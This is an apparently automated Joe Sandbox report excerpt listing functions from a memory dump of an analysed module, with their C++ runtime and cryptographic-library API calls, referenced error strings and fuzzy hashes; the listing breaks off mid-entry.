                                                                      • Opcode Fuzzy Hash: 1a3e63e35a022ae3fe23ae617eb751b45fc9220b2baa719390cd0b5f237d7152
                                                                      • Instruction Fuzzy Hash: 8411B476904668BFCB00DF9D8884ADEBBB8FB45664F11422AE814A3240C77469008BE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D31D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc
                                                                      • String ID: i7o$i7o
                                                                      • API String ID: 1579825452-979133862
                                                                      • Opcode ID: 9e6e6c13673dfb3ef1140b33c24a090336ca68d80c69b29319332861010688af
                                                                      • Instruction ID: 86e581f0f505c58c773f263d1cacfd1a25c0fa4c766b4ea992f0ec086df443b3
                                                                      • Opcode Fuzzy Hash: 9e6e6c13673dfb3ef1140b33c24a090336ca68d80c69b29319332861010688af
                                                                      • Instruction Fuzzy Hash: E6819F71A043099FDB04CF58C681B9EBBF1BF48314F1981A9E829AB351DB74F985CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0AF190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4760: __CxxThrowException@8.LIBCMT ref: 6F0A47F9
                                                                        • Part of subcall function 6F0D8D80: _malloc.LIBCMT ref: 6F0D8D8A
                                                                        • Part of subcall function 6F0D8D80: _malloc.LIBCMT ref: 6F0D8DAF
                                                                      • _memcpy_s.LIBCMT ref: 6F0AF282
                                                                      • _memset.LIBCMT ref: 6F0AF293
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                                      • String ID: @
                                                                      • API String ID: 3081897325-2766056989
                                                                      • Opcode ID: ecedddb18d0c10869a7e143908c77816b9b3f4b429d49677717db7b0c7912e32
                                                                      • Instruction ID: 602a07c9012d1069cfe442d010f6d3f881cf22cd6cd2e73bc4e548e3158f6e49
                                                                      • Opcode Fuzzy Hash: ecedddb18d0c10869a7e143908c77816b9b3f4b429d49677717db7b0c7912e32
                                                                      • Instruction Fuzzy Hash: 4D519D75D00348EFDB10DFA4C990BDEBBB4BF55308F108199D84967281DB726A49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A4E80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4EFC
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4F16
                                                                        • Part of subcall function 6F0A4D90: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DA9
                                                                        • Part of subcall function 6F0A4D90: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DCA
                                                                        • Part of subcall function 6F0A4D90: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4DE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_
                                                                      • String ID: string too long
                                                                      • API String ID: 909987262-2556327735
                                                                      • Opcode ID: 8170b638eb73495811cdb0787f2329c0a34c9c2f7d54602d45f4bb9bbf3ef1f7
                                                                      • Instruction ID: 7f3f2e3be07afc07308d04c3a9029c760a0c9584a13b0d2ebbb87a41b60b5fb1
                                                                      • Opcode Fuzzy Hash: 8170b638eb73495811cdb0787f2329c0a34c9c2f7d54602d45f4bb9bbf3ef1f7
                                                                      • Instruction Fuzzy Hash: F5312B3E300200ABD724DDECE450B6EF7EAFFD5660B50452FE4558B6A2CF32A8408791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A18C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A194F
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      • std::exception::exception.LIBCMT ref: 6F0A198E
                                                                        • Part of subcall function 6F1095C1: std::exception::operator=.LIBCMT ref: 6F1095DA
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4067
                                                                      Strings
                                                                      • Clone() is not implemented yet., xrefs: 6F0A18ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrowstd::exception::exceptionstd::exception::operator=
                                                                      • String ID: Clone() is not implemented yet.
                                                                      • API String ID: 1131504612-226299721
                                                                      • Opcode ID: f2c1e3e0b85014d78b38558fac3733242e8ca6fc623f68965062fb26c592c223
                                                                      • Instruction ID: 40a5a663b3805898d4883f38c8fd1341b31034ff89e104a0bf777cbce19f2c03
                                                                      • Opcode Fuzzy Hash: f2c1e3e0b85014d78b38558fac3733242e8ca6fc623f68965062fb26c592c223
                                                                      • Instruction Fuzzy Hash: 413169B1804248AFCB14DFD9D840BAEFBF8FB09360F10462EE421A7681DB756654CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D5560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D5657
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      Strings
                                                                      • InputBuffer, xrefs: 6F0D55BF
                                                                      • StringStore: missing InputBuffer argument, xrefs: 6F0D55E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                      • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                      • API String ID: 3718517217-2380213735
                                                                      • Opcode ID: 3511a18fb9d0aff78aa9dd199bc96f85cc702efedeeb0c965d967b7a1587b8eb
                                                                      • Instruction ID: 6a5a6019594098433c905ede8a4a0e60bc43cdd321914bfe99b1d6c3c984d1e7
                                                                      • Opcode Fuzzy Hash: 3511a18fb9d0aff78aa9dd199bc96f85cc702efedeeb0c965d967b7a1587b8eb
                                                                      • Instruction Fuzzy Hash: 244145B55087809FC310CF69C490B5BFBE0BB99754F504A2DF5A987391DB70A918CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A1EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0A1F36
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      • std::exception::exception.LIBCMT ref: 6F0A1F6E
                                                                        • Part of subcall function 6F1095C1: std::exception::operator=.LIBCMT ref: 6F1095DA
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A4067
                                                                      Strings
                                                                      • CryptoMaterial: this object does not support precomputation, xrefs: 6F0A1ED4
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrowstd::exception::exceptionstd::exception::operator=
                                                                      • String ID: CryptoMaterial: this object does not support precomputation
                                                                      • API String ID: 1131504612-3625584042
                                                                      • Opcode ID: 9833cf6b1f4acb7a89fefaa2a359b704a04872083f59e547ce65e3fdbef26687
                                                                      • Instruction ID: 76ae4ae4695fa236f6a1a93e6d9090a93fb023f648daef6459d2a8106c971610
                                                                      • Opcode Fuzzy Hash: 9833cf6b1f4acb7a89fefaa2a359b704a04872083f59e547ce65e3fdbef26687
                                                                      • Instruction Fuzzy Hash: 2331ADB1804248AFCB04DFD8D880BAEFBF8FB09360F10462EE420A7781DB756514CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B5750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0B576B
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F1090ED
                                                                        • Part of subcall function 6F1090D8: __CxxThrowException@8.LIBCMT ref: 6F109102
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F109113
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0B5782
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                      • String ID: string too long
                                                                      • API String ID: 963545896-2556327735
                                                                      • Opcode ID: 6c267a084bbeba1cf5458057255af33ec1daacf7cb836699ccdb4fff9e1630fc
                                                                      • Instruction ID: a709d386e0bbd2249460d5420620136c02c80dde1efaa6e5aa59992664b3c79e
                                                                      • Opcode Fuzzy Hash: 6c267a084bbeba1cf5458057255af33ec1daacf7cb836699ccdb4fff9e1630fc
                                                                      • Instruction Fuzzy Hash: E211A2363447109BD321AA9CF890B7AF3E9AF95660F6006AFE55287684C772A84487A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0C584D
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F1090ED
                                                                        • Part of subcall function 6F1090D8: __CxxThrowException@8.LIBCMT ref: 6F109102
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F109113
                                                                      • VariantClear.OLEAUT32(00000000), ref: 6F0C5899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                                      • String ID: vector<T> too long
                                                                      • API String ID: 2677079660-3788999226
                                                                      • Opcode ID: e94201eb4ea9078607924fe60ea518648bf78987afbd95694b138ff37a795206
                                                                      • Instruction ID: 375db71ffc018373c7c8c43bba04ba89db9296e43cbb162a46befcfe71723196
                                                                      • Opcode Fuzzy Hash: e94201eb4ea9078607924fe60ea518648bf78987afbd95694b138ff37a795206
                                                                      • Instruction Fuzzy Hash: E921717AA006099FD710DF6CC880A6EB7F5FF88364F50462EE855A7780DB34B9448B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B0150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0A4010: std::_Xinvalid_argument.LIBCPMT ref: 6F0A402A
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B0201
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      Strings
                                                                      • StringSink: OutputStringPointer not specified, xrefs: 6F0B019B
                                                                      • OutputStringPointer, xrefs: 6F0B018C
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                      • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                      • API String ID: 3718517217-1331214609
                                                                      • Opcode ID: 7d0359fe8607427ebd919c10a90d20701c8fbc04ddd9556431df9732d218e087
                                                                      • Instruction ID: f7518cd99a3512f1dbca6add4f4251253cfa0fe47350b4d6292eb7e7d07e8d35
                                                                      • Opcode Fuzzy Hash: 7d0359fe8607427ebd919c10a90d20701c8fbc04ddd9556431df9732d218e087
                                                                      • Instruction Fuzzy Hash: 6F217C75D04248AFCB04DFD8D990B9DFBB4FB48394F10821EE821A7381DB356658CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0A4620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0A4636
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F10913A
                                                                        • Part of subcall function 6F109125: __CxxThrowException@8.LIBCMT ref: 6F10914F
                                                                        • Part of subcall function 6F109125: std::exception::exception.LIBCMT ref: 6F109160
                                                                      • _memmove.LIBCMT ref: 6F0A466F
                                                                      Strings
                                                                      • invalid string position, xrefs: 6F0A4631
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                      • String ID: invalid string position
                                                                      • API String ID: 1785806476-1799206989
                                                                      • Opcode ID: 283f25e8836fa6385073c4cdbd2d3820b6bbda3fd0468d921a1fa61d52ded0c2
                                                                      • Instruction ID: 2ca8a7345d0eb411ee214eac76868d7e90f8c9b1a603444cabb0183ed0674774
                                                                      • Opcode Fuzzy Hash: 283f25e8836fa6385073c4cdbd2d3820b6bbda3fd0468d921a1fa61d52ded0c2
                                                                      • Instruction Fuzzy Hash: 70012B39300300ABC3248DECDD90B5AF3E6FBC4650B24492EE091CB716DEB2EC4187A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F113EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: NameName::
                                                                      • String ID: {flat}
                                                                      • API String ID: 1333004437-2606204563
                                                                      • Opcode ID: 4569359c8c9e6e98784979d91823fa11e4c491eeab861146a3eb8e8655e56742
                                                                      • Instruction ID: 688467f795864f628302318d2caed0216b639320c53f167b8d46f006f8410813
                                                                      • Opcode Fuzzy Hash: 4569359c8c9e6e98784979d91823fa11e4c491eeab861146a3eb8e8655e56742
                                                                      • Instruction Fuzzy Hash: 40F0E5711493449FCB01CF58C055BE83BA19B823D5F04C052E85C0F38AC732E467D764
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B7680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,F3D820D6), ref: 6F0B76AD
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,F3D820D6), ref: 6F0B76FF
                                                                      • EnterCriticalSection.KERNEL32(F3D820D6,?,?,?,F3D820D6), ref: 6F0B770D
